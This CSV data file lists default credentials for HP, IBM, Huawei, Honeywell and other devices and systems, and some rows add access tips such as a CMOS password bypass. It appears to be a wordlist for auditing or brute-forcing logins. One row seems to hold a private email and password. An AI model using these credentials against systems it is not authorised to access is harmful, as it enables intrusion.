+hayes,Century,MR200,,system,isp,Admin,, +hewlett-packard,CommandView SDM,,Secure Manager,,AUTORAID,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,ADVMAIL,HP,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,ADVMAIL,HPOFFICE DATA,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPONLY,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPP187 SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPWORD PUB,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,LOTUS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,MANAGER,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,MGR,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,SERVICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,SUPPORT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,FIELD.SUPPORT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,MANAGER.SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,MGR.SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,OP.OPERATOR,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,HPOFFICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,MAIL,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,MPE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,REMOTE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,TELESUP,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,COGNOS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,HPOFFICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,ITF3000,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,SECURITY,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,TCH,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,TELESUP,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGE,VESOFT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CAROLIAN,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CCC,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CNAS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,COGNOS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CONV,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPDESK,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPOFFICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPONLY,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP187,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP189,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP196,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,INTX3,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,ITF3000,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,NETBASE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,REGO,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,RJE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,ROBELLE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,SECURITY,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,TELESUP,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,VESOFT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,WORD,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,XLSERVER,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,COGNOS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,DISC,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SUPPORT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SYSTEM,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,PCUSER,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,RSBCMON,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,SPOOLMAN,HPOFFICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,WP,HPOFFICE,,, +hewlett-packard,LaserJet Net Printers,,Admin,,,,, +hewlett-packard,LaserJet Net Printers,,Ones with Jetdirect on them,,,,, +hewlett-packard,LaserJet Net Printers,,Ones with Jetdirect on them,Anonymous,,,, +hewlett-packard,LaserJet Net Printers,,User,,,,, +hewlett-packard,LaserJet Net Printers,,User,Anonymous,,,, +hewlett-packard,Vectra,,,,hewlpack,,, +hewlett-packard,Vectra,,Admin,,hewlpack,,, +hewlett-packard,Webmin,,0.84,admin,hp.com,,, +hewlettpackard,CommandView SDM,,Multi,N/A,AUTORAID,Secure Manager,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HP,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HPOFFICE DATA,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPONLY,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPP187 SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPWORD PUB,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,LOTUS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,MANAGER,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,MGR,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,SERVICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,SUPPORT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,FIELD.SUPPORT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,MANAGER.SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,MGR.SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,OP.OPERATOR,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,HPOFFICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,MAIL,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,MPE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,REMOTE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,TELESUP,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,COGNOS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,HPOFFICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,ITF3000,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SECURITY,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TCH,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TELESUP,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGE,VESOFT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CAROLIAN,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CCC,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CNAS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,COGNOS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CONV,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPDESK,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPOFFICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPONLY,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP187,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP189,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP196,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,INTX3,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,ITF3000,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,NETBASE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,REGO,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,RJE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,ROBELLE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,SECURITY,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,TELESUP,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,VESOFT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,WORD,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,XLSERVER,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,COGNOS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,DISC,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SUPPORT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYSTEM,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,PCUSER,SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,RSBCMON,SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,SPOOLMAN,HPOFFICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,WP,HPOFFICE,,, +hewlettpackard,HP Jetdirect (All Models),,,,,,Any, +hewlettpackard,ISEE,,Multi,admin,isee,Admin,, +hewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,9100,,,User,Type what you want and close telnet session to print it out, +hewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,FTP,Anonymous,,User,send files to be printed, +hewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,HTTP,,,Admin,HTTP interface, +hewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,Telnet,,,Admin,press enter twice if no response in telnet, +hewlettpackard,MPE-XL,,,HELLO,FIELD.SUPPORT,,, +hewlettpackard,MPE-XL,,,HELLO,MANAGER.SYS,,, +hewlettpackard,MPE-XL,,,HELLO,MGR.SYS,,, +hewlettpackard,MPE-XL,,,MANAGER,HPOFFICE,,, +hewlettpackard,MPE-XL,,,MGR,CAROLIAN,,, +hewlettpackard,MPE-XL,,,MGR,CCC,,, +hewlettpackard,MPE-XL,,,OPERATOR,COGNOS,,, +hewlettpackard,Motive Chorus,,HTTP (port 5060),admin,isee,,, +hewlettpackard,Officejet,all versions,http,admin,,admin,http interface, +hewlettpackard,Power Manager,3,HTTP,admin,admin,Admin,, +hewlettpackard,Vectra,,Console,,hewlpack,Admin,, +hewlettpackard,iLo,,http,Admin,Admin,Admin,, +hewlettpackard,iLo,,http,oper,oper,,, +hewlettpackard,sa7200,,Multi,admin,,Admin,, +hewlettpackard,sa7200,,Multi,admin,admin,Admin,, +hewlettpackard,webmin,0.84,HTTP,admin,hp.com,Admin,, +honeywell,Experion,,,LocalComServer,LCS pwd 03,,, +honeywell,Experion,,,TPSLocalServer,TLS pwd 03,,, +horizon datasys,FoolProof,,,,foolproof,,, +horizondatasys,FoolProof,,,,foolproof,Admin,, +hosting controller,Hosting Controller,,,AdvWebadmin,advcomm500349,,, +hp,sa7200,,,admin,,,, +hp,sa7200,,Admin,admin,,,, +hp,sa7200,,Admin,admin,admin,,, +huawei,B932,,http:192.168.1.1,,,,, +huawei,MT880r,,Multi,TMAR#HWMT8007079,,Admin,, +huawei,SmartAX MT882,,,admin,admin,,, +huawei,e226,,,admin,admin,,, +huwai,Modem,,,Admin,admin,,, +huwai,Modem,,Multi,Admin,admin,,, +iblitzz,BWA711/All Models,All,HTTP,admin,admin,Admin,This Information Works On All Models Of The Blitzz Line, +ibm,2210,,,def,trade,,RIP, +ibm,3534 F08 Fibre Switch,,,admin,password,,, +ibm,3534 F08 Fibre Switch,,Admin,admin,password,,, +ibm,3534 F08 Fibre Switch,,Multi,admin,password,Admin,, +ibm,3583 Tape Library,,HTTP,admin,secure,Admin,, +ibm,390e,,,,admin,,, +ibm,390e,,Admin,,admin,,, +ibm,390e,,Multi,,admin,Admin,, +ibm,600x,,,,admin,,, +ibm,600x,,Admin,,admin,,, +ibm,600x,,Multi,,admin,Admin,, +ibm,8224 HUB,,,vt100,public,,, +ibm,8224 HUB,,Admin,vt100,public,,, +ibm,8224 HUB,,Multi,vt100,public,Admin,Swap MAC address chip from other 8224, +ibm,8225,,,I5rDv2b2JjA8Mm,A52896nG93096a,,, +ibm,8225,,Admin,I5rDv2b2JjA8Mm,A52896nG93096a,,, +ibm,8225,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin,, +ibm,8237,,,I5rDv2b2JjA8Mm,A52896nG93096a,,, +ibm,8237,,Admin,I5rDv2b2JjA8Mm,A52896nG93096a,,, +ibm,8237,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin,, +ibm,8239 Token Ring HUB,,2.5,,R1QTPS,,, +ibm,8239 Token Ring HUB,,Utility Program,,R1QTPS,,, +ibm,8239 Token Ring HUB,2.5,Console,,R1QTPS,Utility Program,, +ibm,A21m,,,,,,, +ibm,A21m,,Admin,,,,, +ibm,A21m,,Multi,,,Admin,, +ibm,AIX,,,guest,guest,,, +ibm,AIX,,4.X,admin,admin,,, +ibm,AIX,,Multi,guest,,User,, +ibm,AIX,,Multi,guest,guest,User,, +ibm,AIX,,User,admin,admin,,, +ibm,AIX,,User,guest,,,, +ibm,AIX,,User,guest,guest,,, +ibm,AIX,4.X,Multi,admin,admin,User,, +ibm,AS/400,,,QSECOFR,QSECOFR,,Any, +ibm,AS/400,,,QSRV,QSRV,,, +ibm,AS/400,,,QSRVBAS,QSRVBAS,,, +ibm,AS/400,,,QUSER,QUSER,,OS/400, +ibm,AS/400,,,qpgmr,qpgmr,,, +ibm,AS/400,,,qsysopr,qsysopr,,, +ibm,Aptiva,,,,,CMOS,Press both mouse buttons repeatedly during boot to bypass CMOS password, +ibm,Ascend OEM Routers,,,,ascend,,, +ibm,Ascend OEM Routers,,Admin,,ascend,,, +ibm,Ascend OEM Routers,,Telnet,,ascend,Admin,, +ibm,BladeCenter Mgmt Console,,HTTP,USERID,PASSW0RD,Admin,, +ibm,CICS,,,$SRV,$SRV,,, +ibm,CICS,,,CICSUSER,CISSUS,,, +ibm,CICS,,,DBDCCICS,DBDCCIC,,, +ibm,CICS,,,FORSE,FORSE,,, +ibm,CICS,,,OPER,OPER,,, +ibm,CICS,,,POST,BASE,,, +ibm,CICS,,,PRODCICS,PRODCICS,,, +ibm,CICS,,,PROG,PROG,,, +ibm,CICS,,,SYSA,SYSA,,, +ibm,CICS,,,VCSRV,VCSRV,,, +ibm,DB2,,,db2admin,db2admin,,WinNT, +ibm,DB2,,,db2fenc1,db2fenc1,,, +ibm,Directory - Web Administration Tool,5.1,HTTP,superadmin,secret,Admin,Documented in Web Administration Guide, +ibm,Fibre Switch,,3534 F08,admin,password,,, +ibm,Hardware Management Console,3,ssh,hscroot,abc123,Admin,, +ibm,IBM,,Multi,,,Admin,, +ibm,Infoprint 6700,,Multi,root,,Admin,Also works for older 4400 printers and probably Printronics equivalents as well., +ibm,LAN Server / OS/2,,,username,password,,2.1 3.0 4., +ibm,Lotus Domino Go WebServer (net.commerce edition),,,webadmin,webibm,,ANY ?, +ibm,NetCommerce PRO,,,ncadmin,ncadmin,,3.2, +ibm,OS/400,,,11111111,11111111,,, +ibm,OS/400,,,22222222,22222222,,, +ibm,OS/400,,,QSECOFR,QSECOFR,,OS/400, +ibm,OS/400,,,ibm,2222,,, +ibm,OS/400,,,ibm,password,,, +ibm,OS/400,,,ibm,service,,, +ibm,OS/400,,,qpgmr,qpgmr,,, +ibm,OS/400,,,qsecofr,11111111,,, +ibm,OS/400,,,qsecofr,22222222,,, +ibm,OS/400,,,qsecofr,qsecofr,,, +ibm,OS/400,,,qserv,qserv,,, +ibm,OS/400,,,qsrv,qsrv,,, +ibm,OS/400,,,qsrvbas,qsrvbas,,, +ibm,OS/400,,,qsvr,ibmcel,,, +ibm,OS/400,,,qsvr,qsvr,,, +ibm,OS/400,,,qsysopr,qsysopr,,, +ibm,OS/400,,,quser,quser,,, +ibm,OS/400,,,secofr,secofr,,, +ibm,OS/400,,,sedacm,secacm,,, +ibm,OS/400,,,sysopr,sysopr,,, +ibm,OS/400,,,user,USERP,,, +ibm,OS/400,,Multi,11111111,11111111,,, +ibm,OS/400,,Multi,22222222,22222222,,, +ibm,OS/400,,Multi,ibm,2222,,, +ibm,OS/400,,Multi,ibm,password,,, +ibm,OS/400,,Multi,ibm,service,,, +ibm,OS/400,,Multi,qpgmr,qpgmr,,, +ibm,OS/400,,Multi,qsecofr,11111111,,, +ibm,OS/400,,Multi,qsecofr,22222222,,, +ibm,OS/400,,Multi,qsecofr,qsecofr,,, +ibm,OS/400,,Multi,qserv,qserv,,, +ibm,OS/400,,Multi,qsrv,11111111,,, +ibm,OS/400,,Multi,qsrv,22222222,,, +ibm,OS/400,,Multi,qsrv,qsrv,,, +ibm,OS/400,,Multi,qsrvbas,qsrvbas,,, +ibm,OS/400,,Multi,qsvr,ibmcel,,, +ibm,OS/400,,Multi,qsvr,qsvr,,, +ibm,OS/400,,Multi,qsysopr,qsysopr,,, +ibm,OS/400,,Multi,quser,quser,,, +ibm,OS/400,,Multi,secofr,secofr,,, +ibm,OS/400,,Multi,sedacm,sedacm,,, +ibm,OS/400,,Multi,sysopr,sysopr,,, +ibm,OS/400,,Multi,userp,,No,, +ibm,PC BIOS,,,,IBM,,, +ibm,PC BIOS,,,,sertafu,,, +ibm,PC BIOS,,Admin,,IBM,,, +ibm,PC BIOS,,Admin,,MBIU0,,, +ibm,PC BIOS,,Admin,,sertafu,,, +ibm,PC BIOS,,Console,,IBM,Admin,, +ibm,PC BIOS,,Console,,MBIU0,Admin,, +ibm,PC BIOS,,Console,,merlin,No,, +ibm,PC BIOS,,Console,,sertafu,Admin,, +ibm,POS CMOS,,,ESSEX,,,, +ibm,POS CMOS,,,IPC,,,, +ibm,POS CMOS,,Console,ESSEX,,,, +ibm,POS CMOS,,Console,IPC,,,, +ibm,RACF,,,IBMUSER,SYS1,,, +ibm,RS/6000,,,root,ibm,,AIX, +ibm,RSA,,9091,wpsadmin,wpsadmin,,, +ibm,RSA,5.0,HTTP,wpsadmin,wpsadmin,9091,, +ibm,Remote Supervisor Adapter (RSA),,HTTP,USERID,PASSW0RD,Admin,, +ibm,T20,,Multi,,admin,Admin,, +ibm,T42,,HTTP,Administrator,admin,Admin,, +ibm,TS3100(3573-L2U),,http,admin,secure,,, +ibm,TS3100,,,admin,secure,,, +ibm,Tivoli,,,admin,admin,,, +ibm,Tivoli,,HTTP,admin,admin,Admin,, +ibm,TotalStorage Enterprise Server,,,storwatch,specialist,,, +ibm,TotalStorage Enterprise Server,,Admin,storwatch,specialist,,, +ibm,TotalStorage Enterprise Server,,Multi,storwatch,specialist,Admin,, +ibm,TotalStorage,,,storwatch,specialist,,, +ibm,VM/CMS,,,$ALOC$,,,, +ibm,VM/CMS,,,ADMIN,,,, +ibm,VM/CMS,,,AP2SVP,,,, +ibm,VM/CMS,,,APL2PP,,,, +ibm,VM/CMS,,,AUTOLOG1,,,, +ibm,VM/CMS,,,BATCH,,,, +ibm,VM/CMS,,,BATCH1,,,, +ibm,VM/CMS,,,BATCH2,,,, +ibm,VM/CMS,,,CCC,,,, +ibm,VM/CMS,,,CMSBATCH,,,, +ibm,VM/CMS,,,CMSUSER,,,, +ibm,VM/CMS,,,CPNUC,,,, +ibm,VM/CMS,,,CPRM,,,, +ibm,VM/CMS,,,CSPUSER,,,, +ibm,VM/CMS,,,CVIEW,,,, +ibm,VM/CMS,,,DATAMOVE,,,, +ibm,VM/CMS,,,DEMO1,,,, +ibm,VM/CMS,,,DEMO2,,,, +ibm,VM/CMS,,,DEMO3,,,, +ibm,VM/CMS,,,DEMO4,,,, +ibm,VM/CMS,,,DIRECT,,,, +ibm,VM/CMS,,,DIRMAINT,,,, +ibm,VM/CMS,,,DISKCNT,,,, +ibm,VM/CMS,,,EREP,,,, +ibm,VM/CMS,,,FSFADMIN,,,, +ibm,VM/CMS,,,FSFTASK1,,,, +ibm,VM/CMS,,,FSFTASK2,,,, +ibm,VM/CMS,,,GCS,,,, +ibm,VM/CMS,,,IDMS,,,, +ibm,VM/CMS,,,IDMSSE,,,, +ibm,VM/CMS,,,IIPS,,,, +ibm,VM/CMS,,,IPFSERV,,,, +ibm,VM/CMS,,,ISPVM,,,, +ibm,VM/CMS,,,IVPM1,,,, +ibm,VM/CMS,,,IVPM2,,,, +ibm,VM/CMS,,,MAINT,,,, +ibm,VM/CMS,,,MOESERV,,,, +ibm,VM/CMS,,,NEVIEW,,,, +ibm,VM/CMS,,,OLTSEP,,,, +ibm,VM/CMS,,,OP1,,,, +ibm,VM/CMS,,,OPERATIONS,OPERATIONS,,, +ibm,VM/CMS,,,OPERATNS,,,, +ibm,VM/CMS,,,OPERATOR,,,, +ibm,VM/CMS,,,PDMREMI,,,, +ibm,VM/CMS,,,PENG,,,, +ibm,VM/CMS,,,PROCAL,,,, +ibm,VM/CMS,,,PRODBM,,,, +ibm,VM/CMS,,,PROMAIL,,,, +ibm,VM/CMS,,,PSFMAINT,,,, +ibm,VM/CMS,,,PVM,,,, +ibm,VM/CMS,,,RDM470,,,, +ibm,VM/CMS,,,ROUTER,,,, +ibm,VM/CMS,,,RSCS,,,, +ibm,VM/CMS,,,RSCSV2,,,, +ibm,VM/CMS,,,SAVSYS,,,, +ibm,VM/CMS,,,SFCMI,,,, +ibm,VM/CMS,,,SFCNTRL,,,, +ibm,VM/CMS,,,SMART,,,, +ibm,VM/CMS,,,SQLDBA,,,, +ibm,VM/CMS,,,SQLUSER,,,, +ibm,VM/CMS,,,SYSADMIN,,,, +ibm,VM/CMS,,,SYSCKP,,,, +ibm,VM/CMS,,,SYSDUMP1,,,, +ibm,VM/CMS,,,SYSERR,,,, +ibm,VM/CMS,,,SYSWRM,,,, +ibm,VM/CMS,,,TDISK,,,, +ibm,VM/CMS,,,TEMP,,,, +ibm,VM/CMS,,,TSAFVM,,,, +ibm,VM/CMS,,,VASTEST,,,, +ibm,VM/CMS,,,VM3812,,,, +ibm,VM/CMS,,,VMARCH,,,, +ibm,VM/CMS,,,VMASMON,,,, +ibm,VM/CMS,,,VMASSYS,,,, +ibm,VM/CMS,,,VMBACKUP,,,, +ibm,VM/CMS,,,VMBSYSAD,,,, +ibm,VM/CMS,,,VMMAP,,,, +ibm,VM/CMS,,,VMTAPE,,,, +ibm,VM/CMS,,,VMTLIBR,,,, +ibm,VM/CMS,,,VMUTIL,,,, +ibm,VM/CMS,,,VSEIPO,,,, +ibm,VM/CMS,,,VSEMAINT,,,, +ibm,VM/CMS,,,VSEMAN,,,, +ibm,VM/CMS,,,VTAM,,,, +ibm,VM/CMS,,,VTAM,VTAM,,, +ibm,VM/CMS,,,VTAMUSER,,,, +ibm,VM/CMS,,Multi,$ALOC$,,,, +ibm,VM/CMS,,Multi,ADMIN,,,, +ibm,VM/CMS,,Multi,AP2SVP,,,, +ibm,VM/CMS,,Multi,APL2PP,,,, +ibm,VM/CMS,,Multi,AUTOLOG1,,,, +ibm,VM/CMS,,Multi,BATCH,,,, +ibm,VM/CMS,,Multi,BATCH1,,,, +ibm,VM/CMS,,Multi,BATCH2,,,, +ibm,VM/CMS,,Multi,CCC,,,, +ibm,VM/CMS,,Multi,CMSBATCH,,,, +ibm,VM/CMS,,Multi,CMSBATCH,CMSBATCH,,, +ibm,VM/CMS,,Multi,CMSUSER,,,, +ibm,VM/CMS,,Multi,CPNUC,,,, +ibm,VM/CMS,,Multi,CPRM,,,, +ibm,VM/CMS,,Multi,CSPUSER,,,, +ibm,VM/CMS,,Multi,CVIEW,,,, +ibm,VM/CMS,,Multi,DATAMOVE,,,, +ibm,VM/CMS,,Multi,DEMO1,,,, +ibm,VM/CMS,,Multi,DEMO2,,,, +ibm,VM/CMS,,Multi,DEMO3,,,, +ibm,VM/CMS,,Multi,DEMO4,,,, +ibm,VM/CMS,,Multi,DIRECT,,,, +ibm,VM/CMS,,Multi,DIRMAINT,,,, +ibm,VM/CMS,,Multi,DISKCNT,,,, +ibm,VM/CMS,,Multi,EREP,,,, +ibm,VM/CMS,,Multi,FSFADMIN,,,, +ibm,VM/CMS,,Multi,FSFTASK1,,,, +ibm,VM/CMS,,Multi,FSFTASK2,,,, +ibm,VM/CMS,,Multi,GCS,,,, +ibm,VM/CMS,,Multi,IDMS,,,, +ibm,VM/CMS,,Multi,IDMSSE,,,, +ibm,VM/CMS,,Multi,IIPS,,,, +ibm,VM/CMS,,Multi,IPFSERV,,,, +ibm,VM/CMS,,Multi,ISPVM,,,, +ibm,VM/CMS,,Multi,IVPM1,,,, +ibm,VM/CMS,,Multi,IVPM2,,,, +ibm,VM/CMS,,Multi,MAINT,,,, +ibm,VM/CMS,,Multi,MAINT,MAINT,,, +ibm,VM/CMS,,Multi,MOESERV,,,, +ibm,VM/CMS,,Multi,NEVIEW,,,, +ibm,VM/CMS,,Multi,OLTSEP,,,, +ibm,VM/CMS,,Multi,OP1,,,, +ibm,VM/CMS,,Multi,OPERATNS,,,, +ibm,VM/CMS,,Multi,OPERATNS,OPERATNS,,, +ibm,VM/CMS,,Multi,OPERATOR,,,, +ibm,VM/CMS,,Multi,OPERATOR,OPERATOR,,, +ibm,VM/CMS,,Multi,PDMREMI,,,, +ibm,VM/CMS,,Multi,PENG,,,, +ibm,VM/CMS,,Multi,PROCAL,,,, +ibm,VM/CMS,,Multi,PRODBM,,,, +ibm,VM/CMS,,Multi,PROMAIL,,,, +ibm,VM/CMS,,Multi,PSFMAINT,,,, +ibm,VM/CMS,,Multi,PVM,,,, +ibm,VM/CMS,,Multi,RDM470,,,, +ibm,VM/CMS,,Multi,ROUTER,,,, +ibm,VM/CMS,,Multi,RSCS,,,, +ibm,VM/CMS,,Multi,RSCSV2,,,, +ibm,VM/CMS,,Multi,SAVSYS,,,, +ibm,VM/CMS,,Multi,SFCMI,,,, +ibm,VM/CMS,,Multi,SFCNTRL,,,, +ibm,VM/CMS,,Multi,SMART,,,, +ibm,VM/CMS,,Multi,SQLDBA,,,, +ibm,VM/CMS,,Multi,SQLUSER,,,, +ibm,VM/CMS,,Multi,SYSADMIN,,,, +ibm,VM/CMS,,Multi,SYSCKP,,,, +ibm,VM/CMS,,Multi,SYSDUMP1,,,, +ibm,VM/CMS,,Multi,SYSERR,,,, +ibm,VM/CMS,,Multi,SYSWRM,,,, +ibm,VM/CMS,,Multi,TDISK,,,, +ibm,VM/CMS,,Multi,TEMP,,,, +ibm,VM/CMS,,Multi,TSAFVM,,,, +ibm,VM/CMS,,Multi,VASTEST,,,, +ibm,VM/CMS,,Multi,VM3812,,,, +ibm,VM/CMS,,Multi,VMARCH,,,, +ibm,VM/CMS,,Multi,VMASMON,,,, +ibm,VM/CMS,,Multi,VMASSYS,,,, +ibm,VM/CMS,,Multi,VMBACKUP,,,, +ibm,VM/CMS,,Multi,VMBSYSAD,,,, +ibm,VM/CMS,,Multi,VMMAP,,,, +ibm,VM/CMS,,Multi,VMTAPE,,,, +ibm,VM/CMS,,Multi,VMTLIBR,,,, +ibm,VM/CMS,,Multi,VMUTIL,,,, +ibm,VM/CMS,,Multi,VSEIPO,,,, +ibm,VM/CMS,,Multi,VSEMAINT,,,, +ibm,VM/CMS,,Multi,VSEMAN,,,, +ibm,VM/CMS,,Multi,VTAM,,,, +ibm,VM/CMS,,Multi,VTAM,VTAM,,, +ibm,VM/CMS,,Multi,VTAMUSER,,,, +ibm,a20m,,,,admin,,, +ibm,a20m,,Admin,,admin,,, +ibm,a20m,,Multi,,admin,Admin,, +ibm,management hw,,Multi,USERID,PASSW0RD,admin,, +ibm,management hw,,admin,USERID,PASSW0RD,,, +ibm,routers,,router,msmadhuastro@gmail.com,06725A1201,,, +ibm,switch,8275-217,Telnet,admin,,Admin,, +imai,Traffic Shaper,TS-1012,HTTP,,,Admin,default IP 1.2.3.4, +imperiasoftware,Imperia Content Managment System,,,superuser,superuser,,Unix/NT, +informix,Database,,,informix,informix,,, +infosmart,SOHO router,,HTTP,admin,0,Admin,, +infotec,ISC2525,System v1.67 / NIB v5.14 / WIM v1.10,http://192.168.0.100,admin,,Admin,, +infrant,ReadyNAS RAIDiator,3.01c1-p1 to -p6,,admin,infrant1,administrator,, +infrant,ReadyNAS RAIDiator,3.01c1-p1 to -p6,,root,see note,,root password is generated 